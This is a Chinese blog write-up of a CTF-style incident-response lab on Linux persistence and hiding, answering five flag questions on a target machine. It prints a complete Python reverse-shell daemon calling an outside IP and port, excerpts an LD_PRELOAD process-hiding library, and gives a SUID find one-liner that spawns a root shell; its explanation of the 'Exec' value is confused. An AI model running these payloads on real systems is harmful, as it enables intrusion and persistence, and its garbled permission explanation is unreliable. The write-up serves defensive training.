• 玄机——第三章 权限维持-linux权限维持-隐藏 wp

玄机——第三章 权限维持-linux权限维持-隐藏 wp

2025-04-25 01:34:19 1 阅读

文章目录

      • 一、前言
      • 二、概览
        • 简介
      • 三、参考文章
      • 四、步骤(解析)
        • 准备步骤#1.0
        • 步骤#1.1
          • 黑客隐藏的隐藏的文件 完整路径md5
        • 步骤#1.2
          • 黑客隐藏的文件反弹shell的ip+端口 {ip:port}
        • 步骤#1.3
          • 黑客提权所用的命令 完整路径的md5 flag{md5}
            • 拓展1.1
            • 拓展1.2
        • 步骤#1.4
          • 黑客尝试注入恶意代码的工具完整路径md5
        • 步骤#1.5
          • 使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

一、前言

题目链接:第三章 权限维持-linux权限维持-隐藏

三连私信免费送玄机注册邀请码私信!!!看见就回!!注意私信!!

这里先简单了解一下权限维持-linux权限维持-隐藏;

首先在 Linux 系统上,权限维持是黑客攻击过程中的一个重要环节。攻击者成功获得系统权限后,会采取各种手段来保持对系统的访问控制,防止被发现并移除。这些手段可以分为多种,包括隐藏进程、文件、网络连接等。

以下是一些常见的 Linux 权限维持和隐藏方法:

  1. 后门程序

攻击者通常会在受害系统中安装后门程序,以便在需要时重新获得访问权限。常见的后门程序包括:

  • SSH 后门:创建一个新的用户,配置 SSH 公钥认证,避免密码登录被检测到。
  • 反弹 Shell:通过反弹 Shell 连接到攻击者的机器,获取远程控制权限。
  • Web Shell:通过 Web Shell(如 PHP 代码嵌入)远程控制 Web 服务器。
  1. Rootkit

Rootkit 是一种能够隐藏自身及其他恶意程序的工具。安装 Rootkit 后,攻击者可以隐藏进程、文件和网络连接,防止被系统管理员发现。

  • 内核级 Rootkit:直接修改内核数据结构和函数,隐藏进程、文件和网络连接。
  • 用户级 Rootkit:通过劫持系统库函数(如 ld_preload),隐藏特定进程和文件。
  1. 持久化机制

攻击者会使用各种持久化机制,以确保即使系统重启后也能重新获得控制权限。

  • 修改启动脚本:在系统启动脚本中加入恶意代码,保证每次系统启动时都会执行。
  • crontab 定时任务:在 crontab 中添加恶意任务,定期执行恶意程序。
  1. 文件隐藏

攻击者会将恶意文件和工具隐藏在系统中,以防被发现。

  • 文件名伪装:将恶意文件命名为类似系统文件的名称,如 syslogdsshd 等。
  • 隐藏目录:使用隐藏目录(如 . 开头的目录),将恶意文件放置其中。
  1. 网络连接隐藏

攻击者可能会隐藏与其控制服务器的网络连接,以防被网络管理员发现。

  • 端口重定向:使用工具(如 iptables)重定向流量到特定端口,隐藏实际通信端口。
  • 加密通信:使用加密协议(如 SSH、SSL)进行通信,防止流量被检测和分析。
  1. 日志清除

攻击者会清除或篡改系统日志,以隐藏入侵痕迹。

  • 清除命令历史:删除或篡改 .bash_history 文件。
  • 修改系统日志:直接修改系统日志文件(如 /var/log 下的日志),删除入侵痕迹。
  1. 使用合法进程

攻击者会利用合法的系统进程进行恶意活动,以隐藏其行为。

  • 进程注入:将恶意代码注入到合法的系统进程中。
  • 利用系统工具:使用系统自带的工具(如 netcatcurl)进行恶意操作。

这些权限维持和隐藏技术使得攻击者能够长时间保持对系统的控制权,同时降低被检测和移除的风险。

二、概览

简介

ssh root@env.xj.edisec.net -p 密码 xjqxwcyc
1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5}
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec**** 值 作为flag提交 flag{/xxx/xxx/xxx}**

三、参考文章

第三章 - 权限维持 - Linux 权限维持隐藏

玄机应急响应wp

四、步骤(解析)

准备步骤#1.0

使用Xshell连接靶机,新建或者SSH都可;(具体操作不再多叙,示例文章:webshell查杀)

新建;(注意填写靶机端口号)

成功连接;

步骤#1.1
黑客隐藏的隐藏的文件 完整路径md5

解题思路

题目让我们找出黑车隐藏的文件的路径接着MD5加密提交,那我们可以直接使用find来进行查找以点开头的隐藏文件,那有的人有会问了,为什么查以点开头的文件可以找到隐藏的文件?

简而言之,使用 find 命令查找隐藏文件(以 . 开头的文件)是因为 Unix/Linux 系统中,文件名以 . 开头的文件默认是隐藏文件。这些文件不会显示在普通的 ls 命令输出中,除非使用 ls -a。黑客常常利用这种特性,将恶意文件或脚本以 . 开头来隐藏。

使用命令;

find / -name ".*"

得到;

好巧不巧也不知道是不是故意的,就在最下面得到;

/tmp/.temp
/tmp/.temp/libprocesshider/.git
/tmp/.temp/libprocesshider/.gitignore

简单分析一下亮点;

分析

  1. /tmp/.temp

    • 首先这个目录以 . 开头,因此是一个隐藏目录。
    • 其次存放在 /tmp 目录下,这里通常用于临时文件存储。
    • 最后黑客可能利用 /tmp 目录来存放临时的恶意文件,因为 /tmp 通常具有读写权限。
  2. /tmp/.temp/libprocesshider/

    • 这个子目录也以 . 开头,属于隐藏目录 /tmp/.temp
    • 目录名 libprocesshider 暗示包含用于隐藏进程的库或工具,通常是恶意软件的一部分。
  3. /tmp/.temp/libprocesshider/.git

    • 这是一个隐藏的 .git 目录,表明这个目录可能是一个 Git 仓库。
    • 黑客可能使用 Git 来管理他们的工具或恶意代码。
  4. /tmp/.temp/libprocesshider/.gitignore

    • 这是一个 Git 配置文件,用于指定哪些文件或目录在提交时应被忽略。
    • 这个文件也以 . 开头,是一个隐藏文件。

为什么它们是隐藏文件

  • 默认隐藏:在 Unix/Linux 系统中,以 . 开头的文件和目录默认是隐藏的。这种文件和目录不会在普通的 ls 列表中显示,除非使用 ls -a 命令。
  • 逃避检测:黑客常常利用隐藏文件和目录来逃避系统管理员或安全工具的检测。把恶意文件放在隐藏目录中可以减少被发现的几率。
  • 临时性:将文件放在 /tmp 目录下表明这些文件可能是临时的。系统重启后,某些 /tmp 目录下的文件可能会被删除,从而掩盖黑客的痕迹。

跟进目录“/tmp/.temp/libprocesshider/”进行分析;

使用命令;

ls -la

得到;

得到;

root@xuanji:/tmp/.temp/libprocesshider# ls -la
total 24
drwxr-xr-x. 3 root root  119 Aug  3  2023 .
drwxr-xr-x. 3 root root   29 Aug  3  2023 ..
drwxr-xr-x. 8 root root  163 Aug  3  2023 .git
-rw-r--r--. 1 root root   20 Aug  3  2023 .gitignore
-rwxr-xr-x. 1 root root  826 Aug  3  2023 1.py
-rw-r--r--. 1 root root  168 Aug  3  2023 Makefile
-rw-r--r--. 1 root root 2941 Aug  3  2023 README.md
-rw-r--r--. 1 root root 3477 Aug  3  2023 processhider.c
-rw-r--r--. 1 root root  243 Aug  3  2023 shell.py

发现可疑文件,可能会隐藏恶意活动相关的脚本,我们一个一个进行分析;

那就先从1.py开始吧;(看它不舒服,嫌疑最大)

命令;

cat 1.py

得到;

简单分析一下;

#!/usr/bin/python3

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

while 1:
        try:
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                pass
        time.sleep(2)

这个 Python 脚本文件是一个反弹 shell 程序,具有后台运行的功能。

分析内容

  1. 导入模块

    • 导入了 socketsubprocessossystime 模块。
    • 这些模块分别用于创建网络连接、执行系统命令、进行系统操作、处理系统参数和控制程序延迟。
  2. 第一步 fork 进程

    pidrg = os.fork()
    if pidrg > 0:
    sys.exit(0)

    • os.fork() 创建一个子进程。
    • 如果 pidrg 大于 0,则表示这是父进程,父进程会退出。
    • 子进程继续执行后续代码。
  3. 切换工作目录和会话

    os.chdir(“/”)
    os.setsid()
    os.umask(0) drgpid = os.fork()
    if drgpid > 0:
    sys.exit(0)

    • os.chdir("/") 将当前工作目录更改为根目录 /
    • os.setsid() 创建一个新的会话,并使子进程成为新会话的领导进程。
    • os.umask(0) 设置文件创建掩码为 0。
    • 再次 os.fork() 创建一个新的子进程。
    • 如果 drgpid 大于 0,则父进程退出。最终的子进程继续运行,成为守护进程。
  4. 主循环

    while 1:
    try:
    sys.stdout.flush()
    sys.stderr.flush()
    fdreg = open(“/dev/null”, “w”)
    sys.stdout = fdreg
    sys.stderr = fdreg
    sdregs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sdregs.connect((“114.114.114.121”, 9999))
    os.dup2(sdregs.fileno(), 0)
    os.dup2(sdregs.fileno(), 1)
    os.dup2(sdregs.fileno(), 2)
    p = subprocess.call([“/bin/bash”, “-i”])
    sdregs.close()
    except Exception:
    pass
    time.sleep(2)

    • 无限循环,确保脚本不断运行。
    • 尝试执行以下操作:
      • 刷新标准输出和标准错误。
      • 打开 /dev/null 并将标准输出和标准错误重定向到 /dev/null
      • 创建一个 TCP 套接字连接到 114.114.114.121:9999
      • 使用 os.dup2 将标准输入、输出和错误重定向到这个套接字。
      • 执行 /bin/bash -i,启动一个交互式 shell。
      • 关闭套接字连接。
    • 如果出现异常,忽略并继续循环。
    • 每次循环之间等待 2 秒。

总结

这个脚本的目的是创建一个反弹 shell 连接,将当前系统的命令行接口通过网络发送到远程服务器 114.114.114.121:9999,并在服务器上执行。这种行为通常被黑客用来远程控制受害者的系统。

所以1.py并不是我们这题需要找的文件,接着继续分析一下文件shell.py;

得到;

简单分析一下;

这个 shell.py 文件也是一个反弹 shell 脚本。它的作用是将当前系统的标准输入、标准输出和标准错误重定向到一个远程服务器的网络连接上,从而允许远程服务器对该系统进行命令控制。

总的来说;

这个脚本的目的是启动一个反弹 shell,将当前系统的命令行接口通过网络发送到远程服务器 172.16.10.7:2220,并在服务器上执行。这种行为通常被黑客用来远程控制受害者的系统,跟文件1.py有异曲同工之处

这里查了两个.py后缀结尾的文件还是没有发现,不过没关系,很正常嘛,也许很多博主直接把答案写出来,大家也就看过就过了,但是不知道的是,很多都是博客一个一个进行查找进行分析得出的结果,只是我这里把分析的过程写详细了些,让大家知道其实没那么简单的;

那我们接下来查看一下“processhider.c”文件,因为这其实是一个 C 语言源代码文件,很有可能是用于隐藏进程的核心代码,具体是什么我们来分析看看。

得到;

简单分析一下;(由于代码有些过与太长我就不贴出来了,大家对着解析进行查看即可)

总的来说;

这个 processhider.c 文件的目的是通过动态链接库拦截 readdir 系统调用,来隐藏特定名称的进程(在这个中是 1.py)的目录项,使其在进程列表中不可见。

详细分析;

static const char* process_to_filter = "1.py";

指定要隐藏的进程名称 1.py

static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

get_dir_name 函数通过 dirfd 获取目录文件描述符,并使用 readlink 读取符号链接 /proc/self/fd/ 指向的实际路径。

总结;

这个程序通过动态链接库技术拦截了 readdir 函数调用,在 /proc 目录下过滤出指定进程名的目录项,从而隐藏指定进程,使其在进程列表中不可见。这是一种常见的进程隐藏技术,通常用于恶意软件以隐藏自身,所以“1.py”就是题目让我们找的黑客隐藏文件。

根据提交格式:完整路径md5

完整路径:/tmp/.temp/libprocesshider/1.py

进行MD5加密:在线MD5

得到;

所以;

flag{109ccb5768c70638e24fb46ee7957e37}
步骤#1.2
黑客隐藏的文件反弹shell的ip+端口 {ip:port}

解题思路

题目让我们找出文件反弹shell的ip以及端口号,题一之前分析的文件“1.py”以及“shell.py”想必大家还记得吧?那这答案就很明显了吧,没关系,我们也可以来回忆一下;

文件“1.py”得到;

文件“shell.py”得到;

简单分析一下;

文件1.py;

功能和特点

  1. 双重 Fork 实现进程脱离控制台:

    • 第一次 fork 后父进程退出,使子进程成为孤儿进程,由 init 进程收养。
    • 调用 setsid 创建新会话并成为会话组长。
    • 第二次 fork 确保进程不是会话组长,从而避免再打开控制终端。
  2. 无限循环连接反弹:

    • 在无限循环中尝试连接 114.114.114.121 的 9999 端口。
    • 成功连接后,将标准输入、输出和错误重定向到该 socket。
    • 启动一个 /bin/bash shell。
  3. 隐藏自身输出:

    • 将标准输出和标准错误重定向到 /dev/null,使其不产生任何输出。

文件shell.py;

功能和特点

  1. 简单直接的反弹 Shell:
    • 创建一个 TCP 连接到 172.16.10.7 的 2220 端口。
    • 将标准输入、输出和错误重定向到该 socket。
    • 启动一个交互式的 /bin/sh shell。

对比和区别

  1. 连接目标和端口不同:

    • 1.py 连接 114.114.114.121 的 9999 端口。
    • shell.py 连接 172.16.10.7 的 2220 端口。
  2. shell 类型:

    • 1.py 使用的是 /bin/bash
    • shell.py 使用的是 /bin/sh
  3. 进程处理:

    • 1.py 通过双重 fork 以及会话控制使进程脱离终端并成为守护进程。
    • shell.py 没有进行进程处理,直接运行反弹 shell。
  4. 隐藏输出:

    • 1.py 将标准输出和标准错误重定向到 /dev/null,以隐藏运行时的任何输出。
    • shell.py 没有执行这一步,输出会直接通过 socket 传输。
  5. 无限重连:

    • 1.py 在捕获到异常时,通过 time.sleep(2) 进行无限重连。
    • shell.py 只在执行时进行一次连接,没有重连机制。

总的来说;

这两个脚本都用于反弹 shell,其中 1.py 采用了更复杂的技术来隐藏和持久化,而 shell.py 则是一个简单直接的反弹 shell 实现。它们的共同点是都通过 socket 连接到远程主机并启动一个 shell,允许远程执行命令。区别在于 1.py 更注重隐藏和持续性,而 shell.py 则更加简洁和直接。

题目让我们提交shell的IP以及端口号;

所以;

flag{114.114.114.121:9999}
步骤#1.3
黑客提权所用的命令 完整路径的md5 flag{md5}

解题思路

题目让我们提交黑客提权使用的命令且进行MD5加密提交,那就主要查看系统日志和文件变化记录,查找以下文件可能的变动:

  • /etc/passwd
  • /etc/sudoers
  • 具有 SUID 位设置的文件。

这里系统日志与文件均为发现什么特别点(文件太多一时半会看不过来),那我们就主要查看SUID位设置的文件,那在此之前我们先简单了解一下什么是SUID提权;

SUID(Set User ID)是 Unix/Linux 文件系统中的一种权限位。当文件的 SUID 位被设置时,执行该文件的用户将临时获得文件所有者的权限。这通常用于程序需要执行一些需要更高权限的操作(例如,ping 命令需要发送 ICMP 请求,因此需要 root 权限)。

所以这里我们使用命令;

find / -perm -u=s -type f 2>/dev/null

简单分析一下;

这个命令用于查找系统上所有设置了 SUID 位的文件。具体解释如下:

  • find /: 从根目录开始查找。
  • -perm -u=s: 查找文件权限中包含 SUID 位(即,用户执行该文件时将获得该文件所有者的权限)。
  • -type f: 只查找文件(不包括目录)。
  • 2>/dev/null: 将标准错误输出重定向到 /dev/null,以避免显示权限不足等错误信息。

得到;

简单分析一下;

/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

不难看出“/usr/bin/find”被进行了提权,我们来说说为什么;

在文件列表中,/usr/bin/find 是一个特别值得关注的 SUID 文件,因为 find 命令具有一些可以被恶意利用的特性,

  1. 真正明白到底什么是 find 命令嘛?

find 是一个非常强大的命令行工具,用于在目录树中搜索文件并执行各种操作。find 可以执行指定的命令或脚本,这使得它在具有 SUID 位时变得特别危险。

  1. 利用 SUID find 进行提权

find 命令设置了 SUID 位,并且该命令存在已知漏洞或不当配置,攻击者可以利用它来执行任意命令,从而提升权限。以下是一个利用 SUID find 进行提权的示例:

  1. 检查 SUID 文件的权限

可以使用 ls -l 命令来检查 find 命令的权限:

ls -l /usr/bin/find

得到;

其中,rws 表示文件所有者(root)具有 SUID 位(s),并且文件的所有者是 root,所以不难看出find就是被黑客进行提权。

  1. 为什么 find 特别危险?
  • 强大的功能: find 命令可以执行任意命令或脚本,这意味着如果用户能够控制 find 的输入,他们可以执行任意代码。
  • 常见漏洞: 许多历史版本的 find 命令存在已知漏洞,允许攻击者以 root 权限执行任意代码。
  • 广泛使用: find 是一个常用工具,很多系统管理员和用户都习惯使用它,且往往忽略其安全隐患。

最后总得来说;

在 SUID 文件列表中,/usr/bin/find 因其强大的功能和历史漏洞,可以直接进行提权。攻击者可以利用 SUID find-exec 选项执行任意命令,从而获得高权限(如 root 权限)的 shell。

根据题目让我们提交完整路径的md5;

完整路径:/usr/bin/find

在线MD5

得到;

所以;

flag{7fd5884f493f4aaf96abee286ee04120}
拓展1.1

SUID 提权安全隐患;

如果某个 SUID 程序存在漏洞,攻击者可以利用该漏洞,以文件所有者的权限(通常是 root)执行任意代码,从而实现提权。

常规的 SUID 提权方法;

  • 查找 SUID 文件: 使用 find 命令查找系统中的所有 SUID 文件:

    find / -perm -u=s -type f 2>/dev/null

  • 检查可疑文件: 查看找到的 SUID 文件,寻找常见的提权工具(如 nmapvimfindawkperl 等)是否在列表中。这些工具如果被设置为 SUID,有可能被利用来执行任意命令。

  • 利用漏洞: 如果找到的 SUID 文件有已知的漏洞,可以利用这些漏洞来执行任意命令。例如,某些版本的 nmap 可以通过 --interactive 模式获得一个 shell,进而提权。

如何判断文件是否可能被利用进行提权?

  • 不应拥有 SUID 位的程序: 如常见编辑器(vim)、网络工具(tcpdump)、脚本语言解释器(perl)等。如果这些程序被设置了 SUID 位,通常是异常情况,需要进一步检查。
  • 检查文件的所有权和权限: 例如,一个 root 所有的文件,其权限中包含 SUID 位,可以通过 ls -l 命令查看文件的详细信息。如果发现可疑文件,可以进一步分析其行为。
拓展1.2

示例:利用 SUID find 获取 root shell

假设 find 命令具有 SUID 位,可以使用以下方法获取 root shell:

/usr/bin/find . -exec /bin/sh ; -quit

这里,find 将在当前目录(.)搜索,并使用 -exec 选项执行 /bin/sh(一个新的 shell)。因为 find 具有 SUID 位,这个 shell 将以 root 权限运行。

步骤#1.4
黑客尝试注入恶意代码的工具完整路径md5

解题思路

题目让我们找出注入的恶意代码工具完整路径MD5,首先得先了解一下常用的注入工具有哪一些;

常用的注入工具,包括了不同类型的工具,如命令注入、SQL注入、代码注入等。

  • SQLMap

    • 描述:一个开源的自动化SQL注入工具,能够识别和利用SQL注入漏洞并接管数据库服务器。
    • 用法:适用于各种数据库管理系统(如MySQL、PostgreSQL、Oracle、Microsoft SQL Server等)的SQL注入攻击。
  • Havij

    • 描述:一个自动化的SQL注入工具,具有图形用户界面,能够轻松利用SQL注入漏洞。
    • 用法:用于挖掘和利用SQL注入漏洞,特别适用于初学者。
  • SQLNinja

    • 描述:一个专门针对Microsoft SQL Server的SQL注入工具。
    • 用法:帮助攻击者利用SQL注入漏洞获取系统权限。
  • JSQL Injection

    • 描述:一个开源的跨平台SQL注入工具,支持多种数据库。
    • 用法:提供图形用户界面,便于用户进行SQL注入攻击。
  • Burp Suite

    • 描述:一个用于测试Web应用程序安全性的综合工具,具有SQL注入模块。
    • 用法:手动和自动化的SQL注入测试。
  • Commix

    • 描述:一个自动化的命令注入和命令执行工具。
    • 用法:帮助发现和利用Web应用程序中的命令注入漏洞。
  • Metasploit

    • 描述:一个渗透测试框架,包含多个注入模块(包括SQL注入、命令注入等)。
    • 用法:广泛用于渗透测试和漏洞利用。
  • Cymothoa

    • 描述:一个后门工具,用于将用户空间代码注入到正在运行的进程中。
    • 用法:常用于在受感染的系统上持久化存在并隐蔽地运行恶意代码。
  • BeEF (Browser Exploitation Framework)

    • 描述:一个浏览器攻击框架,用于利用浏览器漏洞并在受害者浏览器上执行恶意代码。
    • 用法:通过浏览器注入代码并控制受害者浏览器会话。
  • W3af (Web Application Attack and Audit Framework)

    • 描述:一个Web应用程序安全扫描器和攻击框架,支持多种注入攻击(如SQL注入、命令注入等)。
    • 用法:用于自动化扫描和攻击Web应用程序。

那就找呗,工具就那么多,题目也没有给出的具体信息,翻一下可能存在的目录;

一开始我使用的是Xftp连接靶机,因为这样直接分析文件相对来说会比直接在靶机上速度快的很多,但是在我一个一个文件分析过去的时候突然发现/opt目录下是空的,这时候我就不得不怀疑了,因为liunx下/opt目录是存放安装第三方软件和应用程序,不应该什么都没有啊,那就只有一个可能被黑客隐藏起来了,接着就去靶机分析/opt目录文件;

因为在Linux系统中,通常将 /opt 目录用于存放可选的、占用空间较大的第三方软件和应用程序。这些程序通常不是系统自带的,也不是通过系统包管理器(如apt、yum等)安装的。

所以想想看一个靶机会有安装三方软件和应用程序?那如果不是黑客注入工具存放地,你说说还能想到啥?

最后的最后也是发现"/opt"隐藏目录下发现了“Cymothoa”工具;

跟进;

Cymothoa后门工具介绍

题目让我们提交完整路径md5;

完整路径:/opt/.cymothoa-1-beta/cymothoa

在线MD5

所以;

flag{087c267368ece4fcf422ff733b51aed9}
步骤#1.5
使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

解题思路

题目让我们执行./x.xx文件就是题一让我们找出的1.py文件,让我们将Exec的值提交,那这里我们先简单了解一下什么是Exec值;

简单来说;

就是Linux系统中的 Exec 相关字段,通常用于查看程序执行时的权限设置。这些字段通常可以在文件系统的详细信息(如 ls -l 命令的输出)中找到。具体来说:

  • 文件权限字段解释

    • 文件或目录权限显示的第一个字段是 Exec 字段。
    • 对于文件,这个字段的值代表了文件的执行权限。
    • 对于目录,这个字段的值表示该目录是否可以被执行(进入)。
  • 具体取值

    • 如果该字段显示为 r,表示文件具有读权限。
    • 如果该字段显示为 w,表示文件具有写权限。
    • 如果该字段显示为 x,表示文件具有执行权限。
    • 如果该字段显示为 -,表示文件没有相应的权限。

举个例子;

例如,一个文件的详细信息可能如下所示:

-rwxr-xr--

在这个例子中,Exec 字段的值为 -rwxr-xr--,这表示:

  • 所有者(Owner)有读、写、执行权限(rwx)。
  • 组(Group)有读、执行权限(r-x)。
  • 其他用户(Others)只有读权限(r–)。

因此,通过查看文件或目录的详细信息,可以了解到文件的具体权限设置,包括是否具有执行权限。

那这里我们先运行一下文件“1.py”;

python3 /tmp/.temp/libprocesshider/1.py

得到;

这边已经成功执行并且查看网络连接;(netstat -anlpt)

根据之前已经可以确认IP地址:114.114.114.121:9999就是反弹shell的IP,所以直接查找一下python3;

which python3

得到;

因为题目让我们提交的是 Exec的 值,所以使用命令ls -la进行查询;

ls -la /usr/bin/python3

命令 ls -la /usr/bin/python3 用于列出 /usr/bin/python3 文件的详细信息,其中包括文件权限、所有者、大小、创建日期等。

得到;

lrwxrwxrwx. 1 root root 9 Mar 23 2014 /usr/bin/python3 -> python3.4

所以;

flag{/usr/bin/python3.4}

简单说一下;

  1. 符号链接解析

    • /usr/bin/python3 是一个符号链接(软链接),指向 python3.4
  2. Exec 值的含义**:

    • 在Linux中,Exec 值是指程序是否可执行(executable)的标志。当文件具有可执行权限时,这个标志位会被设置,表示该文件可以作为一个独立的可执行程序来运行。
  3. 为什么是可执行的

    • 由于 /usr/bin/python3 指向 python3.4,并且在文件的权限字段中显示有 rwx(读、写、执行权限),因此 Exec 值被设置为表示这个文件是可执行的。

所以,根据符号链接指向的实际文件 python3.4 的权限设置,/usr/bin/python3 作为一个符号链接,继承了指向文件的执行权限。

本文地址:https://www.vps345.com/792.html

搜索文章

Tags

PV计算 带宽计算 流量带宽 服务器带宽 上行带宽 上行速率 什么是上行带宽? CC攻击 攻击怎么办 流量攻击 DDOS攻击 服务器被攻击怎么办 源IP 服务器 linux 运维 游戏 云计算 ssh deepseek Ollama 模型联网 API CherryStudio llama 算法 opencv 自然语言处理 神经网络 语言模型 javascript 前端 chrome edge 进程 操作系统 进程控制 Ubuntu python MCP 阿里云 网络 网络安全 网络协议 ubuntu harmonyos 华为 开发语言 typescript 计算机网络 数据库 centos oracle 关系型 安全 分布式 adb nginx 监控 自动化运维 numpy java android c++ c语言 经验分享 php ollama ai 人工智能 llm gitlab node.js json html5 firefox pycharm 深度学习 conda pillow 笔记 C 环境变量 进程地址空间 maven 游戏程序 windows github git 后端 串口服务器 golang pytorch 机器学习 自动化 ssl fastapi MQTT 消息队列 docker 容器 DeepSeek-R1 API接口 多线程服务器 Linux网络编程 Hyper-V WinRM TrustedHosts apache websocket mount挂载磁盘 wrong fs type LVM挂载磁盘 Centos7.9 vscode 开发环境 SSL证书 小程序 c# Flask FastAPI Waitress Gunicorn uWSGI Uvicorn tcp/ip RTSP xop RTP RTSPServer 推流 视频 电脑 matlab react.js 前端面试题 持续部署 YOLOv8 NPU Atlas800 A300I pro asi_bench http 面试 性能优化 jdk intellij-idea 架构 ecm bpm 蓝耘科技 元生代平台工作流 ComfyUI ide MCP server agent C/S LLM Docker Hub docker pull 镜像源 daemon.json Linux zotero WebDAV 同步失败 代理模式 科技 个人开发 YOLO spring IIS .net core Hosting Bundle .NET Framework vs2022 web安全 sql KingBase uni-app 深度优先 图论 并集查找 换根法 树上倍增 ESP32 Dell R750XS postman mock mock server 模拟服务器 mock服务器 Postman内置变量 Postman随机数据 nuxt3 vue3 实时音视频 java-ee udp bash spring cloud kafka hibernate 安全威胁分析 目标检测 计算机视觉 mcp mcp-proxy mcp-inspector fastapi-mcp sse 豆瓣 追剧助手 迅雷 nas 微信 银河麒麟 kylin v10 麒麟 v10 网络结构图 LDAP spring boot tomcat intellij idea 重启 排查 系统重启 日志 原因 openssl 密码学 kubernetes jenkins 云原生 ci/cd mosquitto 学习 智能路由器 外网访问 内网穿透 端口映射 docker compose microsoft 计算机 程序员 华为od django sqlite 服务器主板 AI芯片 嵌入式硬件 信息与通信 华为认证 网络工程师 交换机 开源 硬件架构 单片机 运维开发 shell kamailio sip VoIP 大数据 大数据平台 代码调试 ipdb kylin macos Cursor asm 1024程序员节 springboot远程调试 java项目远程debug docker远程debug java项目远程调试 springboot远程 Java Applet URL操作 服务器建立 Socket编程 网络文件读取 frp armbian u-boot webstorm 国产操作系统 ukui 麒麟kylinos openeuler mysql rust腐蚀 统信 虚拟机安装 debian qt 驱动开发 jar WSL win11 无法解析服务器的名称或地址 vSphere vCenter flask web3.py ftp 升级 CVE-2024-7347 漏洞 postgresql 报错 android studio pygame 小游戏 五子棋 系统安全 big data 孤岛惊魂4 web3 恒源云 tcp JAVA Java autodl 鲲鹏 昇腾 npu 学习方法 程序人生 wps 安卓 僵尸进程 open webui 编辑器 IMM 游戏服务器 TrinityCore 魔兽世界 sysctl.conf vm.nr_hugepages mysql离线安装 ubuntu22.04 mysql8.0 adobe oceanbase 传统数据库升级 银行 前端框架 大语言模型 LLMs Dify 单一职责原则 Python 网络编程 聊天服务器 套接字 TCP 客户端 Socket 物联网 https 负载均衡 seatunnel IDEA AI Agent AI编程 python3.11 计算机外设 gitea hive Hive环境搭建 hive3环境 Hive远程模式 pdf asp.net大文件上传 asp.net大文件上传下载 asp.net大文件上传源码 ASP.NET断点续传 asp.net上传文件夹 asp.net上传大文件 .net core断点续传 嵌入式 linux驱动开发 arm开发 移动云 redis live555 rtsp rtp CUDA PyTorch GCC aarch64 编译安装 HPC visualstudio prometheus flash-attention nfs eureka AIGC 部署 SSL 域名 rsyslog web rag ragflow ragflow 源码启动 rabbitmq ruby 树莓派 VNC 向日葵 Trae IDE AI 原生集成开发环境 Trae AI 测试工具 aws 硬件工程 嵌入式实习 爬虫 mac rclone AList webdav fnOS 本地部署 api DigitalOcean GPU服务器购买 GPU服务器哪里有 GPU服务器 ddos stm32 mongodb EasyConnect Cline 鸿蒙 微服务 ecmascript nextjs react reactjs 黑客技术 历史版本 下载 安装 搜索引擎 ssrf 失效的访问控制 HTML audio 控件组件 vue3 audio音乐播放器 Audio标签自定义样式默认 vue3播放音频文件音效音乐 自定义audio播放器样式 播放暂停调整声音大小下载文件 MI300x DeepSeek 机器人 openwrt Deepseek HiCar CarLife+ CarPlay QT RK3588 grafana ux 多线程 k8s open Euler dde deepin 统信UOS Reactor 设计模式 C++ LLM Web APP Streamlit hadoop bug string模拟实现 深拷贝 浅拷贝 经典的string类问题 三个swap deepseek r1 音视频 防火墙 NAT转发 NAT Server 数学建模 网络攻击模型 命令 unix odoo 服务器动作 Server action 远程桌面 能力提升 面试宝典 技术 IT信息化 环境迁移 创意 社区 策略模式 单例模式 gpu算力 Ubuntu 24.04.1 轻量级服务器 devops springboot 软件工程 css3 gitee rpc 远程过程调用 Windows环境 sentinel 中间件 权限 ollama下载加速 大模型 CPU 直播推流 高效日志打印 串口通信日志 服务器日志 系统状态监控日志 异常记录日志 ffmpeg vsftpd kvm 无桌面 命令行 媒体 微信公众平台 Windows log4j C语言 佛山戴尔服务器维修 佛山三水服务器维修 svn flutter ruoyi 信号处理 联想开天P90Z装win10 远程工作 加解密 Yakit yaklang MacOS录屏软件 bootstrap html 温湿度数据上传到服务器 Arduino HTTP 软考 黑客 jupyter tailscale derp derper 中转 5G 3GPP 卫星通信 C++软件实战问题排查经验分享 0xfeeefeee 0xcdcdcdcd 动态库加载失败 程序启动失败 程序运行权限 标准用户权限与管理员权限 vim 麒麟 bonding 链路聚合 职场和发展 pip rust 博客 医疗APP开发 app开发 cursor windows日志 unity 数据挖掘 Minecraft ip wsl freebsd glibc ui 华为云 HarmonyOS Next agi ansible playbook iDRAC R720xd 远程登录 telnet go vue.js 服务器无法访问 ip地址无法访问 无法访问宝塔面板 宝塔面板打不开 XFS xfs文件系统损坏 I_O error es jvm kind iot 个人博客 集成学习 集成测试 内存 主板 电源 网卡 elasticsearch openEuler visual studio code FunASR ASR rtsp服务器 rtsp server android rtsp服务 安卓rtsp服务器 移动端rtsp服务 大牛直播SDK redhat ios 远程连接 rdp 实验 